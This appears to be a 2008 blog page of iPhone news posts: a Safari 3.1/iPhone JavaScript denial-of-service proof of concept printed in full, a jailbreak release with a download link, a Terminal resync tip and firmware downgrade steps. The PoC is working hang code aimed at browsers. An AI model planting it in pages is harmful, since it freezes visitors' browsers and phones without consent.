Security-Protocols

Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang, and not crash. This DoS also affects iPhones running firmware version 1.1.4 and, all other earlier versions.

When visiting a site with the malformed JavaScript, the iPhone will lock up becoming causing the user to have to reboot the phone. The current workaround is to disable JavaScript on your iPhone and or iPod touch.

Below is the source of PoC which will trigger the hang (not a crash).

Copyright Georgi Guninski

Cannot be used in vulnerability databases

Especially securityfocus/mitre/cve/cert
SCRIPT
var s=String.fromCharCode(257);
var ki=”";
var me=”";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;

alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
SCRIPT


Nate True and The Dev Team has released jailbreak for iPhones and iPod touchs running version firmware 1.1.3. This one is also very similar to the jailbreak which was released earlier this week, only without the issue of your iPhone not working. Do note that this jailbreak requires your iPhone to be running firmware v1.1.2. iPhones running v1.1.1 will need to upgrade to v1.1.2, jailbreak, and then install the “BSD Subsystem” package. The reason for this is because the v1.1.3 jailbreak occurs on the iPhone itself and is therefore platform independent.

This jailbreak does not upgrade the iPhone’s baseband which breaks things like “Locate Me” functionality in Google maps. If your using a valid AT&T account, it is a good idea to upgrade to v1.1.3 and then downgrade to a jailbroken version of v1.1.2.

For the ones who are using an unlocked iPhone, I suggest that you stay away from firmware version 1.1.3 because it will re-lock your iPhone.

I have tested this jailbreak, and it defianlty works as advertised. It does require some patience, but from my experience it didnt have very many issues.

Download here:
http://security-protocols.com/files/Jailbreak-1.1.3.tar.gz

What did the five fingers say to the face? SLAP!

Rick James slaps v1.1.3

The guys over at Lonman06.com are claiming to have access to a jailbroken iPod touch running firmware version 1.1.3. They have provided a video as proof which shows them moving icons around, and also launching installer.app. They have stated that the jailbreak will not be made public until Apple releases the SDK. Below is a quote from their site:

“But now to the bad news…you still have to wait for it. The Jailbreak for 1.1.3 is not going to be released until Apple releases the Software Developers Kit (SDK) sometime in February. I’m not exactly sure why they are waiting to release the jailbreak. The only thing that comes to my mind is that they are doing this so Apple can’t patch the 1.1.3 Jailbreak when SDK is released.”

Source:
http://lonman06.com/2008/01/15/ipod-touch-jailbreak-and-113/

Erica Sadun has found a neat way to sync your iPhone and or iPod touch using Terminal. The command causes your system to reload and sync your iPhone. Below are the steps to do so:

1. Launch System Profiler. Choose Apple > About This Mac > More Info.

2. Identify your iPod In System Profiler, go to Hardware > USB and locate the iPod or iPhone you’re using. Look up the Manufacturer ID (0×05ac (Apple Computer, Inc.) and Product ID (0×1291 for my iPod touch)

3. Launch Terminal.

4. Find the utility. Change directories to /System/Library/PrivateFrameworks/MobileDevice.framework/Versions/A/Resources/.

5. Run reenumerate and give it just one argument: the vendor id followed by a comma followed by the product id, e.g. ./reenumerate 0×05ac,0×1291

6. Give it a second, then iTunes will reload your iPhone / iPod touch and sync it.

I’ve been getting a bunch of emails from people asking me how to downgrade from 1.1.3 back to 1.1.2. Erica Sadun has found a way and unfortunately this method does not retain full functionality in 1.1.2. When using this method, your iPhone will only function as an iPod touch.

I know it’s not perfect, but its about the best we have for now.

The instructions are as follows, courtesy of TUAW:

1. Get a fairly recent version of iPhuc There are many versions floating around. Make sure yours isn’t too old.

2. Locate your 1.1.1 ipod software bundle. On the Mac, this is in ~/Library/iTunes/(iPhone or iPod) Software Updates.

3. Extract the ipsw file Create a new folder and unzip the 1.1.1 .ipsw file. It is actually a renamed zip archive.

4. Locate the WTF file Inside the unzipped ipsw folder go down to Firmware > dfu and find the file that starts with WTF.

5. Connect your iPod or iPhone to the computer and launch iPhuc Make sure that iPhuc connects to your unit and has a normal prompt (one where you can issue the “ls” command and see the contents of your Media folder). If iTunes starts up, quit it.

6. Enter recovery Type enterrecovery, press return and quit iPhuc. Your unit should go into recovery mode.

7. Relaunch iPhuc. You should now see the recovery mode options. Enter filecopytophone followed by the path to the WTF file and press return. Then Enter cmd go and press return. Quit iPhuc.

8. Launch iTunes. It will complain that it has found an iPod or iPhone in recovery mode. Click OK. Then Option-Click (Mac) or Shift-Click (Windows) the Restore button.

9. Choose the 1.1.1 ipsw file Locate the ipsw file (not the unzipped folder) and select it and start your restore. The screen *should* go white. That’s normal. If all is well and good, your iPhone or iPod touch will downgrade succesfully.

10. Dealing with error 1015 If you run into error 1015, connect your newly restored unit to INdependence or try issuing a cmd fsboot from iPhuc.